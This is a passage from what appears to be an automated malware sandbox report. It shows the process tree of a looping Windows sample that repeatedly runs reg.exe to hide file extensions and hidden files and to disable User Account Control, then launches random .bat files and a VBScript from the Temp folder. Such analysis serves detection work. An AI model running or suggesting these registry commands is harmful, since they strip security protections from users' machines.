        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        192⤵
        
        PID:2088
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        192⤵
        
        PID:2588
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        192⤵
        
        PID:2064
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DgUogwwo.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        192⤵
        
        PID:3112
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        193⤵
        
        PID:1012
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        190⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4400
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        190⤵
        
        PID:4816
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        190⤵
        
        PID:1440
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rqEMAwoE.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        190⤵
        
        PID:1860
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        191⤵
        
        PID:3148
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        188⤵
        
        PID:1796
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        189⤵
        
        PID:3800
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        188⤵
        
        PID:2220
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        188⤵
        UAC bypass
        
        PID:1436
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        189⤵
        
        PID:3164
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fGUgsIco.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        188⤵
        
        PID:1272
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        189⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        186⤵
        
        PID:1520
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        186⤵
        
        PID:2656
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        187⤵
        
        PID:4008
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        186⤵
        
        PID:3268
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZOEgowIQ.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        186⤵
        
        PID:2756
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        187⤵
        
        PID:2172
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        187⤵
        
        PID:2636
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        184⤵
        
        PID:672
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        184⤵
        
        PID:4476
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        184⤵
        UAC bypass
        
        PID:2648
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isEkgYMk.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        184⤵
        
        PID:4456
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        185⤵
        
        PID:3032
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        182⤵
        
        PID:1128
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        182⤵
        
        PID:2332
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        182⤵
        Modifies registry key
        
        PID:3800
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qWYIQwcw.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        182⤵
        
        PID:4128
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        183⤵
        
        PID:2348
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        180⤵
        Modifies registry key
        
        PID:3188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        180⤵
        
        PID:3840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        180⤵
        UAC bypass
        
        PID:2460
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WWYAwcYI.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        180⤵
        
        PID:4728
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        181⤵
        
        PID:4364
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        178⤵
        
        PID:4956
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        178⤵
        Modifies registry key
        
        PID:4476
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        178⤵
        UAC bypass
        Modifies registry key
        
        PID:1020
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aMkYoUgs.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        178⤵
        
        PID:1788
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        179⤵
        
        PID:4904
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        176⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        176⤵
        
        PID:1544
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        176⤵
        
        PID:1468
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bEoYYcEo.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        176⤵
        
        PID:3240
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        177⤵
        
        PID:2200
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        174⤵
        
        PID:1208
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        175⤵
        
        PID:844
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        174⤵
        
        PID:4796
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        174⤵
        
        PID:460
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zsEQgQEg.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        174⤵
        
        PID:896
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        175⤵
        
        PID:2756
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        172⤵
        
        PID:5008
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        173⤵
        
        PID:3712
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        172⤵
        
        PID:2524
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        172⤵
        UAC bypass
        
        PID:3324
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TuAcAgcw.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        172⤵
        
        PID:4200
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        173⤵
        
        PID:4772
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        170⤵
        Modifies visibility of file extensions in Explorer
        
        PID:232
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        170⤵
        
        PID:1536
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        171⤵
        
        PID:3436
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        170⤵
        
        PID:1188
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        171⤵
        
        PID:1128
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JSUAQoYk.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        170⤵
        
        PID:468
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        171⤵
        
        PID:952
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        168⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2228
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        168⤵
        
        PID:4008
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        168⤵
        
        PID:2172
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oSYUYAcg.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        168⤵
        
        PID:3336
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        169⤵
        
        PID:3464
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        166⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4964
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        166⤵
        
        PID:1660
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        166⤵
        
        PID:2300
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uakIAAkE.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        166⤵
        
        PID:3164
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        167⤵
        
        PID:3020
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        167⤵
        
        PID:5052
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        164⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:3916
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        164⤵
        
        PID:4688
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        164⤵
        UAC bypass
        
        PID:3944
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oUIgoQQI.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        164⤵
        
        PID:1120
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        165⤵
        
        PID:4760
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        162⤵
        
        PID:4132
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        162⤵
        
        PID:1980
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        163⤵
        
        PID:3632
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        162⤵
        
        PID:4724
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fKQsIscg.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        162⤵
        
        PID:2744
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        163⤵
        
        PID:4996
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        160⤵
        
        PID:5036
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        161⤵
        
        PID:1792
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        160⤵
        
        PID:1928
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        160⤵
        
        PID:3376
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        161⤵
        
        PID:5056
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BcgQEEsY.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        160⤵
        
        PID:784
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        161⤵
        
        PID:4336
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        161⤵
        
        PID:3240
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        158⤵
        
        PID:1236
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        158⤵
        
        PID:3020
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        159⤵
        
        PID:896
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        158⤵
        
        PID:4164
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XQUcIMoI.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        158⤵
        
        PID:1320
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        159⤵
        
        PID:2168
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        156⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4688
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        156⤵
        
        PID:3652
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        156⤵
        
        PID:3064
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xOIgksEQ.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        156⤵
        
        PID:844
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        157⤵
        
        PID:388
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        154⤵
        
        PID:1004
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        154⤵
        
        PID:4008
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        154⤵
        
        PID:3376
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\usEAMgwY.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        154⤵
        
        PID:3712
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        155⤵
        
        PID:1128
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        152⤵
        
        PID:2704
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        152⤵
        Modifies registry key
        
        PID:1080
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        152⤵
        UAC bypass
        
        PID:3556
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AeUooMIs.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        152⤵
        
        PID:896
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        153⤵
        
        PID:2636
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        150⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2196
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        150⤵
        Modifies registry key
        
        PID:4760
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        150⤵
        UAC bypass
        
        PID:2744
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MAkUkocw.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        150⤵
        
        PID:4764
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        151⤵
        
        PID:3632
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        148⤵
        
        PID:1788
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        148⤵
        
        PID:3376
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        148⤵
        
        PID:1004
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bgcMQIoQ.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        148⤵
        
        PID:2336
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        149⤵
        
        PID:2060
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        146⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4364
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        146⤵
        
        PID:4420
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        146⤵
        
        PID:1464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSQEUwkg.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        146⤵
        
        PID:2816
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        147⤵
        
        PID:2656
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        144⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1792
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        144⤵
        
        PID:2392
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        144⤵
        
        PID:1012
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VAEokkYY.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        144⤵
        
        PID:5056
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        145⤵
        
        PID:4672
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        142⤵
        
        PID:2104
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        142⤵
        
        PID:772
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        142⤵
        UAC bypass
        
        PID:4336
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KeoIswYI.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        142⤵
        
        PID:2880
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        143⤵
        
        PID:1600
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        140⤵
        
        PID:1980
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        140⤵
        
        PID:4564
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        140⤵
        UAC bypass
        
        PID:4068
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qOQQIIMs.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        140⤵
        
        PID:1960
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        141⤵
        
        PID:3020
        
        C:\Windows\SysWOW64\reg.exe
        
